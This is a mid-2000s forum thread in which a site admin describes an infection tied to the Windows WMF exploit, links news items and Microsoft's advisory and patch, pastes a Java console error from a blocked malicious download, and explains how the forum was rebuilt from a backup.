Washingtonpost.com reports
Security researchers have released instructions for exploiting a previously unknown security hole in Windows XP and Windows 2003 Web Server with all of the latest patches applied.
Anti-virus company Symantec warned of the new exploit, which it said uses a vulnerability in the way Windows computers process certain image files (Windows Meta Files, or those ending in .wmf).


For the complete article go here:
http://blogs.washingtonpost.com/securityfix/2005/12/exploit_release.html

Trojan.Win32.WMF.exploit.generic
Exploit.WMF.A

xpl.wmf
xml.wmf

The above has infected my computer. Even worse it has affected my admin account on my forum. Now I am trying to get back into this file and get the database backed up but it will not allow me to go any further. It trys to download a file when i use it through firefox. The place it says its from is http://games4all.com, there was another to but I don't remember it. This is basically malicious code that allows for remote access to you for the simple purpose as to use you as a spam bot. Now I am trying to remedy this problem because I need to get in and backup my database. Other accounts don't seem to be affected, so far. Now if this code is in the code for my database then I don't know what I am going to do. Currently I am running my spyware programs, I am also going to run my anti-virus.

Here is more on this problem....

http://www.averyjparker.com/2006/01/01/wmf-exploit-and-windows-98/
http://www3.ca.com/securityadvisor/pest/pest.aspx?id=453096781

Anti Malware Site

www.kbcafe.com/spam/200512.xml

Here is microsofts take on it.....

http://www.microsoft.com/technet/security/advisory/912840.mspx

The download for a fix....

http://www.microsoft.com/downloads/details.aspx?familyid=0C1B4C96-57AE-499E-B89B-215B7BB4D8E9&displaylang=en

Now if that is attached to my code on my server I don't know what to do....

I'm also going to try to log in with linux. If it still happens with that then I think I am well....screwed.

Any help on how to work through this on the database let me know...

This also trys to use the java runtime environment....

Tales from the java console...

load: class BlackBox.class not found.

java.lang.ClassNotFoundException: BlackBox.class

at sun.applet.AppletClassLoader.findClass(Unknown Source)

at java.lang.ClassLoader.loadClass(Unknown Source)

at sun.applet.AppletClassLoader.loadClass(Unknown Source)

at java.lang.ClassLoader.loadClass(Unknown Source)

at sun.applet.AppletClassLoader.loadCode(Unknown Source)

at sun.applet.AppletPanel.createApplet(Unknown Source)

at sun.plugin.AppletViewer.createApplet(Unknown Source)

at sun.applet.AppletPanel.runLoader(Unknown Source)

at sun.applet.AppletPanel.run(Unknown Source)

at java.lang.Thread.run(Unknown Source)

Caused by: java.io.IOException: open HTTP connection failed.

at sun.applet.AppletClassLoader.getBytes(Unknown Source)

at sun.applet.AppletClassLoader.access$100(Unknown Source)

at sun.applet.AppletClassLoader$1.run(Unknown Source)

at java.security.AccessController.doPrivileged(Native Method)

... 10 more

Well its in the code....like i feared...

fraid I can't help. I'm not up on the latest Windows viruses. :(

do you think it would be in the database code or the html code connected to it, because the site works for others. I did the same thing on linux. So it has to be a corruption on a file that is on my host.

I found a way to get in the admin and backup the database. Basically changed the raw database file of another user and made it the admin. So I have that backed up. Now i just need to figure out why it is attached to that particular user file....which is what is baffleing me.

I cleared the cache for the java console, looked through the registry for the particular files, cleared the cache for the browsers, installed the recommended update and restarted....still the same. So that is why i believe it is attached to a file on my host.

Any suggestions....?

Download all the files to a linux box and scan them there.

Also, this is a windows server right? I'd let the host know so they can clean it from their end. You'll never get it all on your own, as you most likely lack the permissions and access needed for a full clean.

I believe it was somehow attached to the php file that initiates the login to that particular user. What I did was create a new user and went to the raw database file and changed the user type to admin. I then backed up the database and removed the forum. After that I recreated the forum, uploaded the picture files and then reinstalled the database. Some things still need to be worked out but so far so good. I took the long way I know but I came to the conclusion that was the best way to do it was a clean install.

The server is suppose to be on a Linux System. The suggestion for downloading it on the linux distro was good and if it happens again, which i hope it doesn't, then i will do that. Once I know more about php and sql I might be able to single out the problem.

Here are some things i ran into while this was happening. Internet explorer did not ingage the java protocol, it just froze....and did not show me it was trying to initiate the 'http://gamez4all.biz'. Firefox on the other hand did and it gave me a weird page with just the footer but the footer said noadwarekey. The site tried to innitiate and the java came up. So because of my virus scanner and Mozilla it didn't ever come through more than in the corrupted code.

When trying to upload the database it did not work correctly when i tried using firefox. I used internet explorer and it worked fine. I'm not sure to as why this happened other than the host may be setup more for internet explorer or the way the proxy works on firefox. I did disable the proxy but it still did not work...but i did not restart the computer. I cleared the cache and cookies of the computer just in case.

Ever heard of buying a virus exploit....well if you haven't then here you go.

http://it.slashdot.org/article.pl?sid=06/02/02/215210&from=rss
http://news.com.com/2100-7349_3-6034591.html?part=rss&tag=6034591&subj=news

I think they found a new market...selling exploits in window software to foriegn countries....